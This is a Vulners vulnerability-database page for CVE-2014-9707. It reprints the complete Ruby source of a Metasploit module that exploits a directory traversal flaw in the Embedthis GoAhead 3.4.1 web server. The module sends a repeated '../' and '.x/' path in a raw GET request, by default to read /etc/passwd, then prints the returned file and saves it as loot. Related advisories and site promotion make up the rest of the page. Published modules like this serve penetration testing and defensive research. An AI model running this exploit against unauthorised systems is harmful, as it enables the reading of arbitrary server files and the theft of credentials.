Lucene search
K

Embedthis GoAhead Embedded Web Server Directory Traversal

🗓️ 07 Apr 2015 23:22:06Reported by Matthew Daley, Roberto Soares Espreto <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 25 Views

This module exploits a directory traversal vulnerability in the Embedthis GoAhead Web Server v3.4.1, allowing an attacker to read arbitrary files with the web server privileges

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2014-9707
29 May 201815:50
circl
CNVD
Embedthis Software GoAhead Arbitrary Code Execution Vulnerability
1 Apr 201500:00
cnvd
CVE
CVE-2014-9707
31 Mar 201514:00
cve
Cvelist
CVE-2014-9707
31 Mar 201514:00
cvelist
Tenable Nessus
GoAhead Embedded Web Server websNormalizeUriPath() Directory Traversal Vulnerability
3 Apr 201500:00
nessus
NVD
CVE-2014-9707
31 Mar 201514:59
nvd
OpenVAS
Embedthis GoAhead Multiple Vulnerabilities (Apr 2015) - Active Check
6 Apr 201500:00
openvas
Packet Storm
GoAhead 3.4.1 Heap Overflow / Traversal
28 Mar 201500:00
packetstorm
Packet Storm
Embedthis GoAhead Embedded Web Server Directory Traversal
1 Sep 202400:00
packetstorm
Prion
Heap overflow
31 Mar 201514:59
prion
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Embedthis GoAhead Embedded Web Server Directory Traversal',
      'Description'    => %q{
        This module exploits a directory traversal vulnerability in the Embedthis
        GoAhead Web Server v3.4.1, allowing an attacker to read arbitrary files
        with the web server privileges.
      },
      'References'     =>
        [
          ['CVE', '2014-9707'],
          ['PACKETSTORM', '131156']
        ],
      'Author'         =>
        [
          'Matthew Daley', # Vulnerability discovery
          'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module
        ],
      'License'        => MSF_LICENSE
    ))

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('FILEPATH', [true, "The path to the file to read", "/etc/passwd"]),
        OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 5 ])
      ])
  end

  def run_host(ip)
    filename = datastore['FILEPATH']
    filename = filename[1, filename.length] if filename =~ /^\//
    traversal = "../" * datastore['DEPTH'] << ".x/" * datastore['DEPTH'] << filename

    res = send_request_raw({
      'method' => 'GET',
      'uri'    => "#{traversal}"
    })

    if res &&
        res.code == 200 &&
        res.headers['Server'] &&
        res.headers['Server'] =~ /GoAhead/

      print_line("#{res.body}")

      fname = datastore['FILEPATH']

      path = store_loot(
        'goahead.traversal',
        'text/plain',
        ip,
        res,
        fname
      )

      print_good("File saved in: #{path}")
    else
      print_error("Nothing was downloaded")
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Mar 2019 19:04Current
0.1Low risk
Vulners AI Score0.1
CVSS 27.5
EPSS0.28237
25